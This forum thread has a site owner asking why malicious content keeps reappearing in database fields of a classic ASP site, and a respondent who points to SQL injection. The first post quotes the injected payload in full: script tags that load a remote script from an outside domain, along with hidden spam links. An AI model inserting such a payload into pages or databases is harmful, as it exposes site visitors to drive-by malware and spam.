Tek-Tips is the largest IT community on the Internet today!

Members share and learn making Tek-Tips Forums the best source of peer-reviewed technical information on the Internet!

  • Congratulations gkittelson on being selected by the Tek-Tips community for having the most helpful posts in the forums last week. Way to Go!

How data sneaks in to the database 1

Status
Not open for further replies.

POSAPAY

IS-IT--Management
Jul 27, 2001
192
HU
Hi All,
Got an e-mail today from google webmaster tools.
Subject: Malware notification regarding "domain.com"
(I've changed the domain only in it.)

When I go to my website, sure enough, something is off.
The sources files are classic asp, and look clean and fine.

When I go to the SQL database, two tables seem to have additional data in only specific columns/fields.

Forum messages table, and another table that has webpage content to display, such as a footer, header etc.

The data added by "something/someone" seems to have been placed with some smarts. On the forum in the messages, only in the body message, and always at the bottom of the text already in it.

Same for the page content table, only specific pages that already had content in the body part, and always at the bottom.

When I navigated the webpage, it brought up some anti virus looking scanning page, and probably infected my computer.(Here goes probably another reinstall)

Funny thing is, the date stamps in the table records didn't change, so I'm figuring they somehow got in directly to SQL server to update only particular fields.

Anybody with any security ideas? I run SQL as is, but with a firewall in front of the servers, so only HTTP traffic should get through. (that is port 80 and 443)

After I edited each field to delete the bad data, it came back in about half a day. I've changed SQL passwords too, and yet again it came back. Any ideas?

Here is the added foreign text:
Code:
</title><script src=[URL unfurl="true"]http://stats-master111.info/ur.php></script></title><script[/URL] src=[URL unfurl="true"]http://stats-master111.info/ur.php></script>[/URL]
Code:
</title><a style=display:none; href=[URL unfurl="true"]http://worid-of-books.com[/URL] >book</a></title><a style=display:none; href=[URL unfurl="true"]http://worid-of-books.com[/URL] >book</a>          </title><a style=display:none; href=[URL unfurl="true"]http://find-top-casinos.com[/URL] >casino</a></title><a style=display:none; href=[URL unfurl="true"]http://find-top-casinos.com[/URL] >casino</a>                  </title><script src=[URL unfurl="true"]http://stats-master111.info/ur.php></script></title><script[/URL] src=[URL unfurl="true"]http://stats-master111.info/ur.php></script>[/URL]
 
This is very likely to be a problem with your ASP scripts. Specifically with [google]SQL Injection[/google].

-George
Microsoft SQL Server MVP
My Blogs
SQLCop
"The great things about standards is that there are so many to choose from." - Fortune Cookie Wisdom
 
Must be... I guess I was lucky until now. Time to get use to using scripts to clean the input. If anyone can think of any other likely way of data updates, please let me know.
 
I've added script against SQL Injections, and cleared previous db records of added contents.
Unless I add any other updates here, the issue should be solved.

Thanks George!
 
i am too facing the same problem, but even after taking care of sql injection problem, the same thing keeps happening in half a day,

what could be the issue?
 
shailesh123a,

You probably have more sql injection problems than you realize. Hate to say it, but my recommendation is to keep looking.

-George
Microsoft SQL Server MVP
My Blogs
SQLCop
"The great things about standards is that there are so many to choose from." - Fortune Cookie Wisdom
 
Status
Not open for further replies.

Part and Inventory Search

Sponsor

Back
Top